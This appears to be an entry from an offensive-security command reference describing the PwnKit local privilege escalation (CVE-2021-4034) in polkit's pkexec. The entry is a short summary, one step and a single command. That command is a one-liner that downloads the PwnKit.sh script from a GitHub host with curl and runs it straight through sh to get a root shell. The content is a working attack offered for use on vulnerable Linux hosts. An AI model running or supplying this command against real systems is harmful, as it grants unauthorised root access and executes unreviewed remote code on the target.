← Back to search

PwnKit Polkit Privesc (CVE-2021-4034)

privesclinuxtool

Summary

Exploit the polkit pkexec vulnerability (CVE-2021-4034) with the ly4k PwnKit one-liner to get an instant root shell on vulnerable Linux hosts.

Walkthrough

PwnKit exploits a memory-corruption flaw in polkit's pkexec (CVE-2021-4034) that affects most Linux distributions, granting an immediate root shell.

Steps

  1. Run the one-liner to fetch and execute PwnKit.sh; if the host is vulnerable it drops you into a root shell. (Download and run locally instead when the target has no internet access.)

Commands

bash

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"